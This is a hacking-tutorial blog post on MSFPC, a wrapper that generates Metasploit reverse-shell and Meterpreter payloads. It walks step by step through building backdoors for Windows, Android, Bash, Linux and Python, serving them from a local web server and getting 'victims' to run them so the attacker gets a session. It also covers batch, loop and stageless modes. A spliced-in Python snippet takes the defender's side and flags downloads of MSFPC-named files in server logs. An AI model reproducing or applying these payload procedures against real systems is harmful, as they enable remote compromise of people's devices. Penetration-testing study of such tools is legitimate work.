Comprehensive Guide on MSFPC

Hello Friends!!

As you are all aware, MSFvenom is the tool in Kali Linux for generating payloads. It is also available as MSFvenom Payload Creator (MSFPC), a wrapper for generating various "basic" Meterpreter payloads via msfvenom; fully automating msfvenom and Metasploit is the end goal.

MSFvenom Payload Creator (MSFPC) is a wrapper that generates multiple types of payloads based on the user's choice. The idea is to be as simple as possible (requiring only one input) to produce a payload.

Source: https://github.com/g0tmi1k/mpc

Author: g0tmi1k

Syntax

msfpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)

Create a Payload with Interactive IP Mode

Let's create a payload for the Windows platform with the help of the following command:

msfpc windows

When you enter the above command, it asks you to confirm the interface:

Which interface should be used?

eth0, lo wan

We press 1 for eth0; it then starts generating the payload and, as a result, gives us the following:

  1. Location of the MSF handler file and the Windows Meterpreter payload created.
  2. Command to run to start multi/handler automatically within the Metasploit Framework.
  3. Command for file transfer through a web server.


Basically, msfpc is designed to reduce the user's effort in generating payloads for various platforms in different file formats. So when you type "msfpc" it displays all supported platform types and generates the file format that corresponds to the one you choose.

Syntax: msfpc <platform-type> <Lhost IP> <Lport>

Windows Payload

If you want to generate a payload to get a Meterpreter session on a victim's machine that runs Windows, all you need to do is type the following:

msfpc windows 192.168.1.109 1234

If you do not mention an IP, it automatically asks you to choose an interface, as discussed above, and uses 443 as the default LPORT. It creates a malicious backdoor in .exe format for 32-bit architecture. It then generates the payload and, as a result, gives us the following details:

  • Location of the MSF handler file and the Windows Meterpreter payload created: '/root/windows-meterpreter-staged-reverse-tcp-1234.exe'
  • Command to run to start multi/handler automatically: msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-1234-exe.rc'
  • Command for file transfer through a web server: python2 -m SimpleHTTPServer 8080


Now run the following commands to launch multi/handler and the web server for file transfer.

msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-1234-exe.rc'
python2 -m SimpleHTTPServer 8080

When the victim browses the following URL (the web server above listens on port 8080), it asks to download and run the .exe file, which provides a Meterpreter session to the attacker.

http://192.168.1.109:8080/root/windows-meterpreter-staged-reverse-tcp-1234.exe

Conclusion: Earlier, attackers used a manual method to generate a payload via the msfvenom command and then used the Metasploit module "multi/handler" to receive the reverse connection as a Meterpreter session. This technique was quite a successful approach to compromising a victim's machine, although it took a lot of time. The same approach is applicable with the help of MSFPC for generating various "basic" Meterpreter payloads via msfvenom.

Android Payload

If you want to generate a payload to get a Meterpreter session on a victim's machine that runs Android, all you need to do is type the following:

msfpc apk 192.168.1.109 1234

It creates a malicious backdoor in .apk format. It then generates the payload and, as a result, gives us the following details:

  • Location of the MSF handler file and the Android Meterpreter payload created: '/root/android-meterpreter-stageless-reverse-tcp-1234.apk'
  • Command to run to start multi/handler automatically: msfconsole -q -r '/root/android-meterpreter-stageless-reverse-tcp-1234.apk.rc'
  • Command for file transfer through a web server: python2 -m SimpleHTTPServer 8080

Now run the following commands to launch multi/handler and the web server for file transfer.

msfconsole -q -r '/root/android-meterpreter-stageless-reverse-tcp-1234.apk.rc'
python2 -m SimpleHTTPServer 8080

When the victim browses the following URL, it asks to install the application; running the .apk provides a Meterpreter session to the attacker.

http://192.168.1.109:8080/root/android-meterpreter-stageless-reverse-tcp-1234.apk

Hence, as said above, you can observe that we have a Meterpreter session on the target's machine.

BASH

The advantage of MSFPC is that it removes the need to remember the payload format for each platform; all we need to do is follow the syntax declared above and the rest is managed by MSFPC automatically. Suppose I want to create a payload for the Bash platform; it takes MSFPC only a few minutes to generate a Bash payload.

msfpc bash 192.168.1.109 1234

It creates a malicious backdoor in .sh format. It then generates the payload and, as a result, gives us the following:

  • Location of the MSF handler file and the Bash shell payload created: '/root/bash-shell-staged-reverse-tcp-1234.sh'
  • Command to run to start multi/handler automatically: msfconsole -q -r '/root/bash-shell-staged-reverse-tcp-1234.sh.rc'
  • Command for file transfer through a web server: python2 -m SimpleHTTPServer 8080

Now run the following commands to launch multi/handler and the web server for file transfer.

msfconsole -q -r '/root/bash-shell-staged-reverse-tcp-1234.sh.rc'
python2 -m SimpleHTTPServer 8080

When the victim browses the following URL, it asks to download the script; once the target runs the Bash script with full permissions, it gives a command shell.

http://192.168.1.109:8080/root/bash-shell-staged-reverse-tcp-1234.sh
chmod 777 bash-shell-staged-reverse-tcp-1234.sh
./bash-shell-staged-reverse-tcp-1234.sh

Hence, as said above, you can observe that we have a command shell on the target's machine, and with the help of the following command we upgrade it to a Meterpreter shell.

sessions -u 1

Linux

If you want to generate a payload to get a Meterpreter session on a victim's machine that runs Linux, all you need to do is type the following:

msfpc linux 192.168.1.109 4444

It creates a malicious backdoor in .elf format. It then generates the payload and, as a result, gives us the following details:

  • Location of the MSF handler file and the Linux shell payload created: '/root/linux-shell-staged-reverse-tcp-4444.elf'
  • Command to run to start multi/handler automatically: msfconsole -q -r '/root/linux-shell-staged-reverse-tcp-4444.elf.rc'
  • Command for file transfer through a web server: python2 -m SimpleHTTPServer 8080


Now run the following commands to launch multi/handler and the web server for file transfer.

msfconsole -q -r '/root/linux-shell-staged-reverse-tcp-4444.elf.rc'
python2 -m SimpleHTTPServer 8080

When the victim browses the following URL, it asks to download the file; once the target runs the .elf file with full permissions, it gives a command shell.

http://192.168.1.109:8080/root/linux-shell-staged-reverse-tcp-4444.elf
chmod 777 linux-shell-staged-reverse-tcp-4444.elf
./linux-shell-staged-reverse-tcp-4444.elf

Hence, as said above, you can observe that we have a command shell on the target's machine, and with the help of the following command we upgrade it to a Meterpreter shell.

sessions -u 1

Python

If you want to generate a payload to get a Meterpreter session on a victim's machine that runs Python, all you need to do is type the following:

msfpc python 192.168.1.109 5555

It creates a malicious backdoor in .py format. It then generates the payload and, as a result, gives us the following details:

  • Location of the MSF handler file and the Python Meterpreter payload created: '/root/python-meterpreter-staged-reverse_tcp-5555.py'
  • Command to run to start multi/handler automatically: msfconsole -q -r '/root/python-meterpreter-staged-reverse_tcp-5555.py.rc'
  • Command for file transfer through a web server: python2 -m SimpleHTTPServer 8080

Now run the following commands to launch multi/handler and the web server for file transfer.

msfconsole -q -r '/root/python-meterpreter-staged-reverse_tcp-5555.py.rc'
python2 -m SimpleHTTPServer 8080

When the victim browses the following URL, it asks to download the script; once the target runs the Python script, it gives a Meterpreter session.

http://192.168.1.109:8080/root/python-meterpreter-staged-reverse_tcp-5555.py
python python-meterpreter-staged-reverse_tcp-5555.py

Hence, as said above, you can observe that we have a Meterpreter session on the target's machine.
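The file names MSFPC produced in the Windows, Android, Bash, Linux and Python sections above all follow one naming convention, and a defender can read it the other way round: the name alone tells you the platform, staging, direction, transport and the port the payload will call back to. The following added example (not part of the original article or of the msfpc project) parses that convention out of file names and flags successful fetches of such files in the stderr log that `python2 -m SimpleHTTPServer 8080` writes; the log format is an assumption and the sample lines are constructed, not captured.

```python
import re

# MSFPC output naming as seen in this article:
#   <platform>-<shell>-<staged|stageless>-<bind|reverse>-<tcp|http|https>-<port>.<ext>
# The Python payload above uses "reverse_tcp", so "-" and "_" are both accepted there.
MSFPC_NAME = re.compile(
    r"(?P<platform>windows|android|bash|linux|python)-"
    r"(?P<shell>meterpreter|shell)-"
    r"(?P<staging>staged|stageless)-"
    r"(?P<direction>bind|reverse)[-_]"
    r"(?P<transport>tcp|https?)-"
    r"(?P<port>\d{1,5})\.(?P<ext>exe|apk|sh|elf|py)\b",
    re.IGNORECASE,
)

# One request line as SimpleHTTPServer logs it to stderr (assumed format):
#   <client> - - [<timestamp>] "<method> <path> HTTP/1.x" <status> -
ACCESS_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

def parse_msfpc_name(name):
    """Return the payload parameters encoded in an MSFPC file name, or None."""
    m = MSFPC_NAME.search(name)
    if m is None:
        return None
    fields = {k: v.lower() for k, v in m.groupdict().items()}
    fields["port"] = int(fields["port"])  # LPORT the payload will call back to
    return fields

def find_msfpc_downloads(lines):
    """Return (client, path, fields) for every successful fetch of an MSFPC-named file."""
    hits = []
    for line in lines:
        m = ACCESS_LINE.match(line)
        if m is None or m["status"] != "200":
            continue
        fields = parse_msfpc_name(m["path"])
        if fields is not None:
            hits.append((m["client"], m["path"], fields))
    return hits

SAMPLE_LOG = [  # constructed lines in SimpleHTTPServer's format, not captured output
    '192.168.1.50 - - [10/Jan/2020 12:00:01] "GET /windows-meterpreter-staged-reverse-tcp-1234.exe HTTP/1.1" 200 -',
    '192.168.1.50 - - [10/Jan/2020 12:00:02] "GET /favicon.ico HTTP/1.1" 404 -',
    '192.168.1.77 - - [10/Jan/2020 12:03:10] "GET /python-meterpreter-staged-reverse_tcp-5555.py HTTP/1.1" 200 -',
    '192.168.1.77 - - [10/Jan/2020 12:03:11] "GET /linux-shell-staged-reverse-tcp-4444.elf HTTP/1.1" 304 -',
]

if __name__ == "__main__":
    print(find_msfpc_downloads(SAMPLE_LOG))
```

The recovered port is the one to look for in outbound connection logs from the client that fetched the file.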

Batch (Generates all Possible Combination Payloads)

Batch is the most significant mode, as it generates as many payload combinations as possible. If we want to create all payloads that can give a Meterpreter session, we can use the following command:

msfpc msf batch eth0

In the output of the above command you can observe that it has generated all possible payload types that give Meterpreter sessions. The rest of the technique for executing the payload and getting the reverse connection is as above.

If we want to create all payloads that can give a command shell session on the target's machine, we can use the following command:

msfpc cmd batch eth0

In the output of the above command you can observe that it has generated all possible payload types that give a command shell.

Loop (Generates One payload for Each Platform)

Loop is also a significant mode, as it generates one of each type of payload with its default values. Hence, by default it generates payloads that provide a Meterpreter session rather than a command shell session.

msfpc verbose loop eth0

In the output of the above command you can observe that it has generated one payload for each platform that gives a Meterpreter session. The rest of the technique for executing the payload and getting the reverse connection is as above.

Generating Stageless Payload

As we all know, there are two types of payloads, staged and stageless, and by default it creates a staged payload. If you want to create a stageless payload, use the following commands to generate one for a command shell session or a Meterpreter session respectively:

msfpc stageless cmd windows 192.168.1.109
msfpc stageless msf windows 192.168.1.109

The rest of the technique for executing the payload and getting the reverse connection is as above.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.

The post Comprehensive Guide on MSFPC appeared first on Hacking Articles.